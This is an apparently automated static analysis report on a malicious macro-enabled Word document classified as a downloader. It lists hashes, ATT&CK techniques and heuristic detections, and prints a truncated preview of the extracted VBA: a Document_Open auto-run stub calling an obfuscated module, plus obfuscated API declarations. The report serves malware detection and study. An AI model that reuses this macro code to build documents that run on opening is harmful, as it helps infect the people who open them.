Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 10f823a04abaaddd…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 191.9 KB
Created: 2019-11-01 07:42:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2020-07-24

MD5: e5aad7d75d6a9da92ca8d16cc8195aab
SHA-1: 301d3e98c840c298eb93b1f7fd18bea21e052d2a
SHA-256: 10f823a04abaaddd0e0e85cf723380539408c462e28b9c712b6a561515a9de7e

Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

This OOXML document contains a VBA project with a Document_Open macro that runs on opening and executes obfuscated code. The critical heuristic 'OLE_VBA_SHELL' indicates use of the Shell() function, which in this context is most likely used to download and execute a second-stage payload. The ClamAV detection (a generic document-downloader signature) further supports classifying the sample as a downloader. Because the extracted VBA source is heavily obfuscated and truncated, a more detailed analysis of its specific actions was not possible.

Heuristics (6)

  • ClamAV: Doc.Downloader.Generic-8011192-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML (medium, OOXML_VBA; 3 related findings)
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OOXML body / shared strings):
      • http://schemas.openxmlformats.org/markup-compatibility/2006
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships
      • http://schemas.openxmlformats.org/officeDocument/2006/math
      • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
      • http://schemas.openxmlformats.org/wordprocessingml/2006/main
      • http://schemas.microsoft.com/office/word/2006/wordml

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 48020 bytes
SHA-256: 43c9ad5f3ce814626c1fb963420b9fe097f0184b606bd1b7e2d2ac434810cda6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    hsdfjh34j5k.ncjjkj34SD4
End Sub

Attribute VB_Name = "hsdfjh34j5k"
Private Type DSFG36SDFGsfj2bhnkijb345
    dsgf4 As Long
    dg43t4 As String
    hj56y As Long
'    nbk54 As Long
'    ngi24 As Long
    dwXCars As Long
    cerved2 As Integer
    htput As Long
    hror As Long
End Type

Private Type DFG546CV345rpaoisdfgi34
    hess As Long
'    ead As Long
    ocessD As Long
    hPrss As Long
    hhad As Long
    deadI As Long
End Type

#If VBA7 Then
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal fkjn54lk4nlws As LongPtr, ByVal cbkjwhefkjhv4j3rhvw As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As LongPtr) As LongPtr
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function CreateIcon Lib "user32" (ByVal hsdfkjo3lw4h5o3ghkijfs As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal nPlanes As Byte, ByVal nBitsPixel As Byte, lpANDbits As Byte, lpXORbits As Byte) As LongPtr
'Declare PtrSafe Function CreateIconFromResource Lib "user32" (presbits As Byte, ByVal dwResSize As LongPtr, ByVal fIcon As LongPtr, ByVal dwVer As LongPtr) As LongPtr
'Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hInstance As LongPtr, ByVal lParam As LongPtr) As LongPtr
'Declare PtrSafe Function CreateMenu Lib "user32" () As LongPtr
'Declare PtrSafe Function CreatePopupMenu Lib "user32" () As LongPtr
'Declare PtrSafe Function CreateWindow Lib "user32" Alias "CreateWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, lpParam As Any) As LongPtr
'Declare PtrSafe Function DdeAddData Lib "user32" Alias "DdeAddDataA" (ByVal hData As LongPtr, pSrc As Byte, ByVal cb As LongPtr, ByVal cbOff As LongPtr) As LongPtr
'Declare PtrSafe Function DdeClientTransaction Lib "user32" (pData As Byte, ByVal cbData As LongPtr, ByVal hConv As LongPtr, ByVal hszItem As LongPtr, ByVal wFmt As LongPtr, ByVal wType As LongPtr, ByVal dwTimeout As LongPtr, pdwResult As LongPtr) As LongPtr
'Declare PtrSafe Function DdeDisconnect Lib "user32" (ByVal hConv As LongPtr) As LongPtr
'Declare PtrSafe Function DdeDisconnectList Lib "user32" (ByVal hConvList As LongPtr) As LongPtr
'Declare PtrSafe Function DdeEnableCallback Lib "user32" (ByVal idInst As LongPtr, ByVal hConv As LongPtr, ByVal wCmd As LongPtr) As LongPtr
'Declare PtrSafe Function DdeFreeDataHandle Lib "user32" (ByVal hData As LongPtr) As LongPtr
'Declare PtrSafe Function DdeFreeStringHandle Lib "user32" (ByVal idInst As LongPtr, ByVal hsz As LongPtr) As LongPtr
'Declare PtrSafe Function DdeGetDat
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 153088 bytes
SHA-256: 0c5d6c5d860d97cb70b151f3382d396798b88b167abd51be43954a15f7785777
Detection: ClamAV Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely